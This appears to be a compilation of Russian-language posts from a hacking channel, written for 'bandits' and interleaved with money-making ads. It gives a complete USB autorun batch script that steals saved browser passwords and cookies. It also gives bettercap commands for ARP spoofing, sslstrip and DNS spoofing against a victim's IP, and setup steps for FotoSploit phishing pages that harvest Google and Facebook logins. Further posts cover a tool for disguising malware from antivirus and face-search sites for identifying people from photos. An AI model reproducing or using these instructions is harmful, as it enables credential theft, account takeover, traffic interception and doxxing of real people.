Как взламывают ВК при помощи фишинга и Android.

Приветствую читателей Черная маска! Сегодня хочу поделиться с вами мануалом, в котором подробно расписано, как всего за 5 минут, можно угнать страничку Вк при помощи фишинга.

Фишинг – это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек узнает ваши учетные данные, и может входить под вашим логином на сайт.

Читать статью l Зеркало

💸Обучающий канал - скоро здесь стартует мое первое авторское обучение по заработку (обязательно подпишись)

#софт

Netbuster

Netbuster - инструмент, который при помощи root-прав и уязимости ARP-протокола позволяет уничтожать любую локальную сеть, а также совместно с другим ПО прослушивать трафик внутри данной локальной сети. Локальной сетью является любой WiFi или устройства, соединенные яерез коммутатор или хаб.

💾 Скачать

​​Cookie Стиллер в флешке

Привет, бандиты. Сегодня речь пойдёт о стиллере внутри флешки, с помощью которого вы сможете украсть все пароли из браузера жертвы. И так, для начала нам понадобится флэшка. В этой флэшке создаём текстовые  файлы:

autorun.inf
и
stealer.bat

Не забудьте включить отображение расширений файлов, чтоб можно было изменить txt на inf и bat. В файле autorun.inf пишем:

*AutoRun*
⌨️Open="stealer.bat"

В файле stealer.bat пишем:

⌨️@echo off
md %~d0Mozilla
md %~d00pera
md %~d0Google
md %~d0Yandex
md %~d0Amigo
CD/D %APPDATA%OperaOpera
cls
copy /y wand.dat %~d0Opera
copy /y cookies.dat %~d0Opera
cd %AppData%MozillaFirefoxProfiles\*.default
copy /y cookies.sqlite %~d0Mozilla
copy /y key3.db %~d0Mozilla
copy /y signons.sqlite %~d0Mozilla
copy /y %AppData%MozillaFirefoxProfiles\*.default %~d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
cls
copy /y "%localappdata%GoogleChromeUser DataDefaultLogin Data" "%~d0Google"
cd %localappdata%YandexYandexBrowserUser DataDefault
copy /y "%localappdata%YandexYandexBrowserUser DataDefaultLogin Data" "%~d0Yandex"
cd %localappdata%AmigoUser DataDefault
copy /y "%localappdata%AmigoUser DataDefaultLogin Data" "%~d0Amigo"
cls
ATTRIB -R -A -S -H
attrib +h %~d0Mozilla
attrib +h %~d0Opera
attrib +h %~d0Google
attrib +h %~d0Yandex
attrib +h %~d0Amigo
attrib +h %~d0search.bat
attrib +h %~d0new
attrib +h %~d0autorun.inf
del: autorun.inf?

Сохраняем и закрываем! Всё, стиллер готов, но есть нюансы в Windows 10 (и 8) наш авторан не сработает, там эта возможность банально отключена. Но, благо, процесс копирования куки проходит очень быстро, поэтому чтобы сесть за чужой комп на минуту много ума не надо.

Ну вот, спиздили вы куки, что дальше делать?

Нажимаем Windows+R и вводим:
⌨️%appdata%

И там удаляем папку браузера, куки которого мы хотим посмотреть и копируем папку с куки с нашей флешки и переносим туда. Теперь качаем программу WebBrowserPassView и запускаем, всё. Видим на каких сайтах какие учётные записи и какие там пароли ✌️

​Взламываем iPhone и другую технику Apple

Многие ошибочно полагают, что iOS-устройства на сегодняшний день являются самыми безопасными на рынке. Именно поэтому сегодня мы развеем данный миф с помощью дистрибутива Kali Linux и специальной утилиты под названием Apple Bleee.

Обновляем пакеты Kali Linux:
apt update && apt upgrade

Клонируем инструмент с репозитория GitHub:
git clone https://github.com/hexway/apple_bleee.git

Далее переходим в директорию инструмента:
cd apple_bleee

Устанавливаем все необходимые зависимости:
apt install bluez libpcap-dev libev-dev libnl-3-dev
apt install libnl-genl-3-dev libnl-route-3-dev
apt install cmake libbluetooth-dev
pip3 install -r requirements.txt

Устанавливаем OWL для AWDL-интерфейса:
git clone https://github.com/seemoo-lab/owl.git  
cd ./owl && git submodule update --init && mkdir build
cd build && cmake .. && make && sudo make install && cd ../..

Теперь нам нужно подключить Bluetooth-адаптер и WiFi-карту с активным режимом мониторинга для работы инструмента.

После того, как все вышеперечисленные действия выполнены, выводим справку инструмента: ble_read_state.py -h

Перед нами появится меню справки, в котором будут показаны доступные команды для удаленного взаимодействия с устройствами Apple.

Бонус для подписчиков. VK Combo за 0 рублей на один месяц по промокоду GET127985

@ShadowCasher

​​​​#скрипт

Криптуем вирус на Termux

AVPASS - утилита для криптования вируса прямо в Termux.

Установка:

apt update -y

apt upgrade -y

apt install git -y

apt install python -y

git clone https://github.com/sslab-gatech/avpass

cd avpass

chmod +x install-dep.sh

bash install-dep.sh

python gen_disguise.py -i [название_вируса] individual

🔑 Делаем с нуля 1500-3000 рублей в день, полностью без вложений

➣​​​​​​​​​​​​​​​​​​​​​​​​​​Sashay

Автоматический установщик полезных инструментов для Хакинга и прочего в Termux.

Установка:
apt install git
Клонируем репу:
git clone https://github.com/chouette254/Sashay.git
Переходим:
cd Sashay
Активируем:
chmod +x install

Запуск утилиты:
sh install

​#лайфхак

Сервисы для пробива по фото

Фото:
azure.microsoft.com — соотнесение лиц, определит вероятность того, что на двух разных изображениях изображен один и тот же человек, и выдаст оценку достоверности
findclone.ru — поиск по базе из VK
pimeyes.com — индексирует фото с сайтов, не точен, ограниченные возможности
search4faces.com — поиск по базам лиц VK и OK
metapicz.com — покажет EXIF
stolencamerafinder.com — определит EXIF и по этим данным найдет какие еще фото были сделаны этим устройством
exif.regex.info — извлекает META-данные
cameratrace.com — определит EXIF и по этим данным найдет какие еще фото были сделаны этим устройством
get-metadata.com — извлекает META-данные
29a.ch — фото-форензика, анализ изображения на изменения
stylesuxx.github.io — декодирует скрытое сообщение в изображении

Для файла формата PDF:
PDFCandy — извлекает META-данные
exif.regex.info — извлекает META-данные
www.get-metadata.com — извлекает META-данные

🔑 Делаем с нуля 1500-3000 рублей в день, полностью без вложений

​Взлом аккаунта GOOGLE c помощью termux

PhotoSploit — софт, с помощью которого можно украсть авторизационные данные пользователя Google или Facebook.

Обновляем термукс:
update
pkg upgrade

Качаем гит:
install git

Качаем саму утилиту:
clone https://github.com/Cesar-Hack-Gray/FotoSploit.git

Переходим в директорию:
FotoSploit

Запускаем установку:
install.sh

Запуск:
./FotoSploit

После запуска, нам необходимо найти картинку в формате .jpg с разрешением не более 430х430. И скопировать ее в директорию термукс.

Далее в утилите устанавливаем нашу картинку :
foto <Fotografiya.jpg>

Задаем заголовок нашей страницы:
title url <заголовок>

И задаем url на который будет перенаправлена жертва :
title url <Google или Facebook>

Далее запускаем нашу страницу:

После этого утилита выведет ссылку на фишинг страницу, по которой должна перейти жертва. Далее жертва перейдет по нашей ссылке, у нее появится заставка, которая потребует авторизацию. Пока жертва находится на нашей странице, инструмент отправит нам информацию об  ее геолокации, IP-адресе, DNS, версии ОС и так далее. Когда жертва введет логин и пароль в графу авторизации, то на атакующий хост придут все авторизационные данные.

#софт

EDS Lite

EDS Lite - аналог всем известного инструмента для шифрования данных VeraCrypt, на Android и IOS. Обладает точно такими же функциями, позволяет зашифровывать и расшифровывать файл-контейнеры любыми видами шифрования и алгоритмами. Имеет возможность открытия одновременно нескольких контейнеров и оперативной их зашифровке.

💾 Скачать

​​Перехват данных и блокировка доступа к сайтам по локальной сети.

Салам, бандиты. Сегодня мы будем перехватывать трафик и блокировать доступ к сайтам через локальную сеть. Сразу предупреждаю, способ не работает в Термукс. Я делал это на Линуксе.

Установка:

💲apt-get update
💲apt-get upgrade
💲apt -y install golang
💲apt -y install bettercap

Для начала нам надо узнать какие устройства подключены к Wi-FI:

💲nmap 192.168.1.1/24 (192.168.1.1 это айпи роуетра)/24 (это маска сети)

Запускаем Bettercap, с его помощью мы будем перехватывать данные и управлять сетью:

💲sudo bettercap

Блокируем сайты

Пишем через запятую сайты, которые хотим заблокировать:

💲set dns.spoof.domains m.vk.com, telegram.org, my.telegram.org

Указываем локальный IP жертвы который мы получили из сканирования NMAP:

💲set dns.spoof.address 192.168.1.5
dns.spoof on - START

После того, как мы запустили dns-spoof, жертва не сможет зайти на указанный вами сайт.

Просматриваем трафик жертвы

1. set http.proxy.sslstrip true
2. events.clear
3. set net.sniff.verbose false
4. set net.sniff.local true
5. set arp.spoof.targets IP жертвы
6. arp.spoof on
7. http.proxy on
8. net.sniff on

После этого у вас будут отображаться все пакеты жертвы ✌️

​Прослушиваем происходящее возле Android-смартфона!

В iOS есть функция «Live-прослушивание», с помощью которой можно прослушивать происходящее вокруг устройства через беспроводные наушники, например, находясь в другой комнате. В Android тоже можно реализовать подобную функцию, но с помощью сторонних приложений.

Одно из таких приложений — Ear Agent. Вам необходимо дать приложению доступ к микрофону, подключить к устройству беспроводные наушники. Как только вы активируете прослушивание, приложение начнёт в режиме реального времени транслировать весь окружающий звук на наушники, которые подключены к устройству.

Учтите, что приложение будет транслировать звук даже на встроенный динамик телефона, поэтому убедитесь в подключении наушников прежде, чем активировать эту функцию. Также вы можете воспользоваться эквалайзером, чтобы усилить или заглушить конкретную частоту, добившись оптимального звучания.

🔗 Ear Agent

🔑 Делаем с нуля 1500-3000 рублей в день, полностью без вложений